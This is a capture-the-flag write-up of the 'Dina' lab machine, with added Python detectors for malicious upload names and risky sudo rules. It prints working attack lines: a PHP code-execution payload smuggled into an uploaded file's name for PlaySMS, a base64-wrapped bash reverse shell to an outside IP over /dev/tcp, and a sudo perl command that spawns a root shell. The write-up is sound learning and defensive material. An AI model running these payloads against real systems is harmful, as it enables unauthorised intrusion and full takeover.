Dina is an easy Linux machine that can be exploited via PlaySMS through PHP code execution. Even though the machine is easy to exploit, getting a reverse shell was a bit of a challenge for me because the injection point does not allow forward slashes; the process could be simplified by using Metasploit. Privilege escalation is very easy and consists of using sudo with Perl to spawn a root shell. Overall Dina was very fun and gave me the opportunity to learn how useful encoding can be to bypass such limitations.
Scanning And Enumeration
An nmap scan on all TCP ports returns only one open port as being an HTTP service.
Browsing to the web service displays the following page.
Looking at the nmap results we see that there are some entries in the robots.txt file which we can access. The directory of interest is the /nothing directory, which displays the following when browsed.
Nothing interesting there so far, but if we look at the source code there is a list of some passwords that could be used at a later stage.
At this stage there was nothing else visible that would give me access to anything else. Using gobuster, however, I was able to find one more directory that we could browse to.
Browsing to this directory shows a backup.zip file that I thought would contain some useful information, so I downloaded it to my machine.
At first I tried to use unzip to extract the contents of the file but kept getting an error; instead of unzip I found that 7za could do the job as well. I extracted the contents of the file using 7za as follows:
7za x backup.zip
When asked for a password I went back to the passwords I had found before and was able to extract its contents with the password “freedom”.
The extracted file was identified as an mp3 file type even though it was very small. Running the cat command against it reveals a username and a new directory to browse.
Browsing to the new directory displays the following login page:
From the extracted file we know that the username is “touhid”, but the password is not there. We found some passwords earlier, and one of them may work for this username. After trying some of the passwords, I was able to log in using the password “diana”.
We can see that we are dealing with PlaySMS, which is open source software that handles outgoing and incoming SMS. While I wasn’t able to enumerate the version number, if we search for public exploits for PlaySMS there is only one PoC, for a vulnerability found in PlaySMS 1.4: https://www.exploit-db.com/exploits/42003. The vulnerability consists of uploading a file whose payload is the name of the file rather than its contents; this works because the server assigns the uploaded file's name to a $filename parameter that is later evaluated as PHP, which gives remote code execution. Please read the information at the URL for more details.
To get RCE (remote command execution) we need to browse to “My account” and then “Send from file”, where we should get the following page to upload a file.
I created a file to execute the id command with the touch command as follows:
touch "<?php system('id'); dia();?>.php"
I then uploaded the file to the server and was able to successfully see command execution.
My original plan to get a reverse shell was to simply execute a bash reverse shell or download a PHP reverse shell to the target machine, but since the file name is what gives us RCE, we can’t use a forward slash in it. To overcome this limitation I remembered a technique where the payload is base64-encoded and then decoded and executed on the target. The reverse shell I will be using is a bash reverse shell as follows:
bash -i >& /dev/tcp/192.168.0.69/443 0>&1
I then took that bash reverse shell and converted it to base64 using the following command:
echo 'bash -i >& /dev/tcp/192.168.0.69/443 0>&1' | base64
I then created the file that was going to be uploaded as follows:
touch "<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNjkvNDQzIDA+JjEK | base64 -d | bash'); dia();?>.php"
The command above echoes the base64-encoded reverse shell, decodes the string with “base64 -d”, and finally executes the result with bash. After uploading this file to the server and setting up a netcat listener, I successfully received a reverse shell as www-data.
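From the defender's side, the two upload names used above (the PHP tag in the file name and the base64-wrapped command chain) are both easy to catch before the upload handler ever touches them. The following is an added example, not PlaySMS code or part of the original post: it applies a strict filename allowlist and, in addition, decodes any long base64-looking token so that a wrapped `/dev/tcp/` shell is still visible in the finding. The sample filenames are constructed from the two names shown in this writeup.

```python
import base64
import re
from typing import Dict, List

# Constructed sample upload names, modelled on the two file names used in this writeup.
SAMPLE_FILENAMES = [
    "contacts.csv",
    "<?php system('id'); dia();?>.php",
    "<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNjkvNDQzIDA+JjEK"
    " | base64 -d | bash'); dia();?>.php",
    "report_2021.txt",
]

# Allowlist an upload handler should enforce: letters, digits, dot, dash, underscore only.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
PHP_TAG = re.compile(r"<\?(php)?", re.IGNORECASE)
DECODE_CHAIN = re.compile(r"base64\s+(-d|--decode)")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Markers of the bash reverse shell described on the page, searched for after decoding.
SHELL_MARKERS = ("/dev/tcp/", "bash -i", ">&")


def decoded_markers(name: str) -> List[str]:
    """Decode every long base64-looking token in the name and report shell markers inside it."""
    found = []
    for token in B64_TOKEN.findall(name):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not valid base64, skip it
            continue
        found.extend(marker for marker in SHELL_MARKERS if marker in text)
    return found


def classify_filename(name: str) -> List[str]:
    """Return the list of reasons this upload name should be rejected (empty means accept)."""
    reasons = []
    if not SAFE_NAME.fullmatch(name):
        reasons.append("chars-outside-allowlist")
    if PHP_TAG.search(name):
        reasons.append("php-tag")
    if DECODE_CHAIN.search(name):
        reasons.append("base64-decode-chain")
    reasons.extend(f"decoded:{marker}" for marker in decoded_markers(name))
    return reasons


def audit_uploads(names: List[str]) -> Dict[str, List[str]]:
    """Map each rejected name to its reasons; accepted names are left out."""
    return {n: r for n in names if (r := classify_filename(n))}
```

Rejecting anything outside the allowlist is the real control; the decode step only exists so the alert says what the wrapped payload was.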
Privilege escalation was very simple, as the path can be identified with the “sudo -l” command, which should be one of the first things you check when looking for sudo permissions. Issuing the command, we can see from the screenshot below that we are allowed to run perl with sudo.
To take advantage of this permission we simply spawn a shell using perl, with sudo and the full path shown in the screenshot above. This can be accomplished using the following command:
sudo /usr/bin/perl -e 'exec "/bin/sh";'
Even though the command prints nothing, typing id shows that we are now root.
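A sudo rule like the one above is the kind of thing a periodic sudoers review should flag automatically. The following is an added example, not part of the original writeup: it parses “sudo -l” style rule lines (constructed samples, modelled on the Perl entry found on this box), and reports rules that are NOPASSWD, that grant ALL, or whose binary is a shell-capable interpreter. The `SHELL_CAPABLE` set is seeded only with the /usr/bin/perl entry from this page; extending it for your own baseline is an assumption left to the reader.

```python
import re
from typing import Dict, List

# Constructed "sudo -l" style rule lines, modelled on the entry found on the box.
SAMPLE_RULES = [
    "(root) NOPASSWD: /usr/bin/perl",
    "(root) /usr/bin/apt-get update",
    "(ALL : ALL) ALL",
]

# Binaries that can hand the caller an interactive shell, so a rule for them is a rule for root.
# Seeded with the page's perl entry; extend for your own environment (assumption).
SHELL_CAPABLE = {"/usr/bin/perl"}

# (runas) [TAG: ...] command  -- the shape "sudo -l" prints for each rule.
RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def audit_rule(line: str) -> List[str]:
    """Return the findings for one rule line; an empty list means nothing to report."""
    m = RULE.match(line.strip())
    if not m:
        return ["unparsed"]
    findings = []
    cmd = m.group("cmd").strip()
    binary = cmd.split()[0]
    if "NOPASSWD" in m.group("tags"):
        findings.append("nopasswd")
    if cmd == "ALL":
        findings.append("all-commands")
    elif binary in SHELL_CAPABLE:
        findings.append(f"shell-capable:{binary}")
    return findings


def audit(rules: List[str]) -> Dict[str, List[str]]:
    """Map each rule with findings to its findings; clean rules are omitted."""
    return {r: f for r in rules if (f := audit_rule(r))}
```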